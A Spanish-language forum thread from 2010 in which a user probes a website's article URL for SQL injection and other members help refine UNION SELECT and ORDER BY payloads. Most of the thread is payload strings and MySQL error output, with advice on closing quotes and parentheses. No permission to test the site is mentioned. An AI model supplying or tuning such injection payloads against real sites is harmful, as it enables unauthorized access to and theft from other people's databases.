Problema al hacer una SQLi

Iniciado por Debci, 1 Septiembre 2010, 19:24 PM

0 Miembros y 4 Visitantes están viendo este tema.

Debci

Hola muy buenas a todos, probando una SQLi he encontrado lo que parece ser un posible vector de ataque:

http://www.mipagina.com/articulo/'1

CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1
CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1


Se supone que asi es vulnerable no?

Pero cuando intento hacer la injeción con esto:

-1+union+select+1,2,3,n--

(Con n me refiero a que voy subiendo de tablas)
Al insertar el -1 se va el error y no aparece ninguna tabla tras probar hasta 20 (no creo que haya mas, sinceramente).

Es vulnerable o simplemente no la estoy atacando bien?

Saludos


tragantras

prueba con

-1') union all select 1,2,3,4,n--
Colaboraciones:
1 2

Debci

Cita de: tragantras en  1 Septiembre 2010, 20:19 PM
prueba con

-1') union all select 1,2,3,4,n--
Bad response :/

CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1
Gracias por tu ayuda :)

Saludos

tragantras

es que segun la salida que pusiste al principio, estoy casi seguro que el cierre sería con

')...

pueds probar a hacer:


-1') union all select 1,2,3,4,'n


fijate que la n lleva la comilla antes! en fin, prueba y postea!
Colaboraciones:
1 2

Debci

Cita de: tragantras en  1 Septiembre 2010, 22:01 PM
es que segun la salida que pusiste al principio, estoy casi seguro que el cierre sería con

')...

pueds probar a hacer:


-1') union all select 1,2,3,4,'n


fijate que la n lleva la comilla antes! en fin, prueba y postea!

Mira, si hago esto:
-1')+union+all+select+1,2,3,4,'5--
Me devuelve:
CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1
Sin embargo si pruebo con:
-1')+union+all+select+1,2,3,'4,'5--
Da esto:
CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5--')' at line 1

Por lo que sospecho que las comillas no estan situadas como me parecia :S

Saludos


tragantras

vale, prueba con:

-1')+union+all+select+1,2,3,4,('5--

(fijate en el parentesis)

sino, intenta realizar la consulta sin comentar el final de ella
Colaboraciones:
1 2

OzX


Debci

#7
Cita de: OzX en  2 Septiembre 2010, 01:21 AM
hi bro.
http://www.mipagina.com/articulo/'1
provaste con?
http://www.mipagina.com/articulo/1'
http://www.mipagina.com/articulo/'1''
te muestra el mismo resultado ? o te tira algun error al poner 2 comillas simples?

http://www.mipagina.com/articulo/1+and+1=1+order+by+99+--+

y con eso que te muestra?
He conseguido que con eso me devuelva:
CMS_GetContentIDByName: Unknown column '87' in 'order clause'

Por lo que hay mas tablas de las que sospechaba!
ES este codigo el que he usado:
-1')+and+1=1+order+by+87+--+


Y con dos comillas suelta esto:
CMS_GetContentIDByName: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''') OR (url_rewrite = ''1''') LIMIT 1' at line 1
Codigo usado:
'1''

Saludos

raul338


Debci